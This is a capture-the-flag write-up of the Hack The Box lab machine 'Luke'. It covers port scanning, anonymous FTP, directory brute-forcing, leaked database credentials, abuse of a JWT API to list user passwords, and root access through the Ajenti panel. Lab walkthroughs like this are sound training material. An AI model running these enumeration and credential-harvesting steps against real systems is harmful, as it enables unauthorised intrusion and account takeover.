Hack The Box - Luke

Quick Summary

Hey guys, today Luke retired and here's my write-up about it. It was an easy machine: all you need to do is enumerate well and you'll find what you need. It's a FreeBSD box, its IP is 10.10.10.137, and I added it to /etc/hosts as luke.htb. Let's jump right in!



Nmap

As always, we start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/luke# nmap -sV -sT -sC -o nmapinitial luke.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-13 12:57 EET
Nmap scan report for luke.htb (10.10.10.137)
Host is up (0.23s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.xx.xx
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.84 seconds
root@kali:~/Desktop/HTB/boxes/luke#



We have FTP on port 21, HTTP on ports 80, 3000 and 8000, and SSH on port 22. From the http-title results we can see a Node.js application on port 3000 and the Ajenti administration panel on port 8000. Before checking the web services, let's take a look at FTP.

FTP

Anonymous login was allowed. There was only one directory, called webapp, which held a single text file called for_Chihiro.txt:

root@kali:~/Desktop/HTB/boxes/luke# ftp luke.htb
Connected to luke.htb.
220 vsFTPd 3.0.3+ (ext.1) ready...
Name (luke.htb:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
226 Directory send OK.
ftp> cd webapp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-xr-xr-x    1 0        0             306 Apr 14 12:37 for_Chihiro.txt
226 Directory send OK.
ftp> get for_Chihiro.txt
local: for_Chihiro.txt remote: for_Chihiro.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for for_Chihiro.txt (306 bytes).
226 Transfer complete.
306 bytes received in 0.00 secs (236.0412 kB/s)
ftp> 221 Goodbye.



for_Chihiro.txt:

Dear Chihiro !!



As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of

the actual website I've created .

Normally you should know where to look but hurry up because I will delete them soon because of our security policies !



Derry



From this note we get two potential usernames: Chihiro and Derry.

We also now know that the source files of the website are stored somewhere on the box, so let's check out the web services.

Web Enumeration, User and Root Flags

On port 80 there was this simple website:





Nothing on it was really interesting, so I brute-forced directories and pages with wfuzz:

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://luke.htb/FUZZ
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000011:  C=403      9 L       24 W          213 Ch        ".hta"
000001:  C=200    108 L      240 W         3138 Ch        ""
000012:  C=403      9 L       24 W          218 Ch        ".htaccess"
000013:  C=403      9 L       24 W          218 Ch        ".htpasswd"
001114:  C=301      7 L       20 W          228 Ch        "css"
002020:  C=200    108 L      240 W         3138 Ch        "index.html"
002179:  C=301      7 L       20 W          227 Ch        "js"
002282:  C=200     21 L      172 W         1093 Ch        "LICENSE"
002435:  C=401     12 L       46 W          381 Ch        "management"
002485:  C=301      7 L       20 W          231 Ch        "member"
004286:  C=301      7 L       20 W          231 Ch        "vendor"

Total time: 116.3713
Processed Requests: 4614
Filtered Requests: 4603
Requests/sec.: 39.64892

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb/FUZZ.php -w /usr/share/wordlists/dirb/common.txt

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://luke.htb/FUZZ.php
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000011:  C=403      9 L       24 W          217 Ch        ".hta"
000012:  C=403      9 L       24 W          222 Ch        ".htaccess"
000013:  C=403      9 L       24 W          222 Ch        ".htpasswd"
000994:  C=200      6 L       25 W          202 Ch        "config"
002347:  C=200     39 L      118 W         1593 Ch        "login"

Total time: 140.0363
Processed Requests: 4614
Filtered Requests: 4609
Requests/sec.: 32.94859



We got /management, /member, /login.php and /config.php. I checked config.php first:



$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword, $db) or die("Connect failed: %s\n" . $conn->error);



Great, we got database credentials. I tried to SSH into the box with them, but it didn't work.

/login.php:



The credentials didn't work here either.

/management:



It uses HTTP basic authentication. I tried to log in, but again the credentials didn't work.

/member was just empty:



On port 8000 there was Ajenti:



Ajenti: An admin’s tool for a more civilized age, providing you with a fast and secure way to manage a remote Linux box at any time using everyday tools like a web terminal, text editor, file manager and others. -ajenti.org

Ajenti provides a web terminal, so if we could access Ajenti we would have a shell. However, the credentials didn't work here either:



The only thing left is the Node.js application, which uses JWT tokens for authentication:

root@kali:~/Desktop/HTB/boxes/luke# curl http://luke.htb:3000/
{"success":false,"message":"Auth token is not supplied"}



I googled that error message and found this article on Medium: A guide for adding JWT token-based authentication to your single page Node.js applications.

I fuzzed the application to verify that the /login endpoint from the article exists here too:

root@kali:~/Desktop/HTB/boxes/luke# wfuzz -c --hc 404 -u http://luke.htb:3000/FUZZ -w /usr/share/wordlists/dirb/common.txt

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://luke.htb:3000/FUZZ
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000001:  C=200      0 L        5 W           56 Ch        ""
002347:  C=200      0 L        2 W           13 Ch        "login"
002348:  C=200      0 L        2 W           13 Ch        "Login"
004245:  C=200      0 L        5 W           56 Ch        "users"

Total time: 147.3540
Processed Requests: 4614
Filtered Requests: 4610
Requests/sec.: 31.31234



/login exists, and there's also another endpoint called /users, which can't be accessed without authentication either:

root@kali:~/Desktop/HTB/boxes/luke# curl http://luke.htb:3000/users
{"success":false,"message":"Auth token is not supplied"}



I tried to log in with the database credentials, but it failed:

root@kali:~/Desktop/HTB/boxes/luke# curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg","username":"root"}' http://luke.htb:3000/login
Forbidden



So I tried the same username used in the article (admin) instead of root, and it worked:

root@kali:~/Desktop/HTB/boxes/luke# curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg","username":"admin"}' http://luke.htb:3000/login
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us"}



Now we can access the application by sending the token as a Bearer token in the Authorization header:

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/
{"message":"Welcome admin ! "}



/users returned a list of these users:

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]



After trying different things, /users/&lt;username&gt; revealed more info about each user, including the password:

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}

root@kali:~/Desktop/HTB/boxes/luke# curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4MzczNjA0LCJleHAiOjE1Njg0NjAwMDR9.Xt854IyFtvP4nQbQa_l63hIJ3aewfVT98gqz5gfU5Us' http://luke.htb:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}



After trying these credentials everywhere, Derry's password got me into /management:





These are the source files Derry was talking about in the note we got from the FTP server. In config.json I found some Ajenti-related settings, including the password for the user root:







Now we can start a terminal as root in Ajenti and get the flags:



And we owned root.

That's it, feedback is appreciated!

Don't forget to read the previous write-ups, tweet about the write-up if you liked it, and follow on Twitter: @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up: Hack The Box - Bastion

Next Hack The Box write-up: Hack The Box - Kryptos